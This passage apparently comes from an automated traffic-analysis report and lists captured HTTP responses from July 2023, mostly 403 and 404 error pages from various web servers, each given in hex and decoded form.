74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:16 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 27 Jul 2023 19:54:16 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 8151119e-84c7-43a2-b22c-6b36207622cbCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iJJqBS0zwrDs4jmMghoQSH0bde0POP5rYGyYgnZodnCEptReb2vkFEsVpvZKapYiKJ6jZSP%2Fp3RVEnolbP7nUGM8oy0%2Fyg0OsTeUOAcDofEA2REMUBzi04cHdYCwOIMwQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=154.999971Server: cloudflareCF-RAY: 7ed76ee9de103732-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 4b93f6dc-4a43-4cc3-9218-1bc50d3a8918CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iVpG%2Fkbcc2pL5hWuVkLFoE%2F1EoUZ30s%2B%2B%2Beaz423Ud66xCKcyi5fqlo1ynZxX5cEjzyJKn0vR8nN0mk2dx%2FZdrd0JW2fUYyEB9o%2FP%2BZYwVfVwNhf0XPMGzaLSAXiwDo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=149.999857Server: cloudflareCF-RAY: 7ed76eea5cbe9baa-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:16 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,m0j2EEknGIVUW/liY8BLLmHFmhKuriwfX/MoZPOzw5ceGdLDLXwpLd0CTVHPbfOdX-Wix-Request-Id: 1690487656.375643360686115442X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:54:06 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:54:17 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Thu, 27 Jul 2023 19:54:17 GMTX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEX-Zen-Fury: 2925b2a1d9e76ed5cdb21e640b51b6c35438b497Data Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 36 35 36 38 22 2c 20 31 36 39 30 34 38 37 36 34 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 37 35 34 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 39 39 36 34 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 35 36 3a 31 37 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC6568", 1690487648, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690487548 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 27 Jul 2023 19:54:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 2X-Kong-Proxy-Latency: 0Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:19 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:19 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:19 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,m0j2EEknGIVUW/liY8BLLn3T7+WtWeNwumXaa7IOwWDJftmKrOReD3ukbbas4YDoX-Wix-Request-Id: 1690487659.375623197464123702X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:19 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: yNIR54QR/sBpeHvvIData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 